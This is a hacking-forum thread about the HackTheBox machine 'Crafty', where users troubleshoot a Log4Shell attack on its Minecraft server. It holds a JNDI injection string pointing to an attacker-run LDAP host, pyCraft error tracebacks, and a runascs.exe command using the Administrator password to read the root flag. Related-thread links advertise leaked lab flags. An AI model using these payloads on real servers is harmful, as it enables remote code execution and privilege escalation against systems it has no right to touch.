HTB - Crafty
by paven - Saturday February 10, 2024 at 02:35 PM
#61
(Feb 11, 2024, 05:15 PM)OliveiraaX Wrote: I managed to get access, but they reset the machine and I got disconnected. Now I can't connect anymore!

Shouldn't have an issue if using VPN release arena
Reply
#62
Hello.
Do you have some tools for decompile the java file ?
Reply
#63
(Feb 11, 2024, 04:35 PM)sh3b4ng5 Wrote:
(Feb 11, 2024, 04:29 PM)OliveiraaX Wrote: Is anyone able to access the server?

Still good on my end.

(Feb 11, 2024, 05:17 PM)sh3b4ng5 Wrote:
(Feb 11, 2024, 05:15 PM)OliveiraaX Wrote: I managed to get access, but they reset the machine and I got disconnected. Now I can't connect anymore!

Shouldn't have an issue if using VPN release arena
I wasn't, thank u very much!
Reply
#64
Has anyone managed to root it?
Reply
#65
(Feb 11, 2024, 06:46 PM)bsbsmaster Wrote: guys i need help pls nv)─(kali㉿kali)-[~/Desktop/log4j-shell-poc/pyCraft]
└─$ python3 start.py
Enter your username: 1
Enter your password (leave blank for offline mode):
Enter server host or host:port (enclose IPv6 addresses in square brackets): 10.10.11.249:25565
Connecting in offline mode...
Exception in thread Networking Thread:
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 596, in run
    self.connection._handle_exception(e, sys.exc_info())
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 539, in _handle_exception
    raise exc_value.with_traceback(exc_tb)
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 592, in run
    self._run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 625, in _run
    packet = self.connection.reactor.read_packet(
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 666, in read_packet
    length = VarInt.read(stream)
            ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/types/basic.py", line 156, in read
    raise EOFError("Unexpected end of message.")
EOFError: Unexpected end of message.

update : ─(env)─(kali㉿kali)-[~/Desktop/log4j-shell-poc/pyCraft]
└─$ python3 start.py
Enter your username: 1
Enter your password (leave blank for offline mode):
Enter server host or host:port (enclose IPv6 addresses in square brackets): 10.10.11.249:25565
Connecting in offline mode...
Connected.
${jndi:ldap://10.10.14.139:1389/a}
Exception in thread Networking Thread:
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 596, in run
    self.connection._handle_exception(e, sys.exc_info())
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 539, in _handle_exception
    raise exc_value.with_traceback(exc_tb)
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 592, in run
    self._run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 625, in _run
    packet = self.connection.reactor.read_packet(
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 666, in read_packet
    length = VarInt.read(stream)
            ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/types/basic.py", line 156, in read
    raise EOFError("Unexpected end of message.")
EOFError: Unexpected end of message.

use tlauncher instead of pycraft
Reply
#66
(Feb 11, 2024, 07:17 PM)bsbsmaster Wrote:
(Feb 11, 2024, 07:10 PM)jonah Wrote:
(Feb 11, 2024, 06:46 PM)bsbsmaster Wrote: guys i need help pls nv)─(kali㉿kali)-[~/Desktop/log4j-shell-poc/pyCraft]
└─$ python3 start.py
Enter your username: 1
Enter your password (leave blank for offline mode):
Enter server host or host:port (enclose IPv6 addresses in square brackets): 10.10.11.249:25565
Connecting in offline mode...
Exception in thread Networking Thread:
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 596, in run
    self.connection._handle_exception(e, sys.exc_info())
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 539, in _handle_exception
    raise exc_value.with_traceback(exc_tb)
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 592, in run
    self._run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 625, in _run
    packet = self.connection.reactor.read_packet(
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 666, in read_packet
    length = VarInt.read(stream)
            ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/types/basic.py", line 156, in read
    raise EOFError("Unexpected end of message.")
EOFError: Unexpected end of message.

update : ─(env)─(kali㉿kali)-[~/Desktop/log4j-shell-poc/pyCraft]
└─$ python3 start.py
Enter your username: 1
Enter your password (leave blank for offline mode):
Enter server host or host:port (enclose IPv6 addresses in square brackets): 10.10.11.249:25565
Connecting in offline mode...
Connected.
${jndi:ldap://10.10.14.139:1389/a}
Exception in thread Networking Thread:
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 596, in run
    self.connection._handle_exception(e, sys.exc_info())
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 539, in _handle_exception
    raise exc_value.with_traceback(exc_tb)
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 592, in run
    self._run()
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 625, in _run
    packet = self.connection.reactor.read_packet(
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/connection.py", line 666, in read_packet
    length = VarInt.read(stream)
            ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/log4j-shell-poc/pyCraft/minecraft/networking/types/basic.py", line 156, in read
    raise EOFError("Unexpected end of message.")
EOFError: Unexpected end of message.

use tlauncher instead of pycraft
           







aslo didnt work

tlauncher 1.16.5 fabric ?
Reply
#67
video walkthrough for crafty https://youtu.be/Is4CLFZMiM8

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#68
Is the server working? I have been trying to connect through tlauncher but I only get timeouts
Reply
#69
(Feb 12, 2024, 06:11 AM)z3r04 Wrote: Is the server working? I have been trying to connect through tlauncher but I only get timeouts

me too,,,,,,,,,,,,
Reply
#70
runascs.exe Administrator s67*********** "cmd /c type c:\Users\Administrator\Desktop\root.txt "
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,971 1 hour ago
Last Post: char0n1507
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 9 563 1 hour ago
Last Post: char0n1507
  CBBH Write Ups hiddenhacker 23 6,341 2 hours ago
Last Post: somecrazykid
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 26 2,796 2 hours ago
Last Post: Neuromanc3r
  [FREE] CPTS 12 FLAGS pulsebreaker 72 2,219 4 hours ago
Last Post: coolguyaroundyou

Forum Jump:


 Users browsing this forum: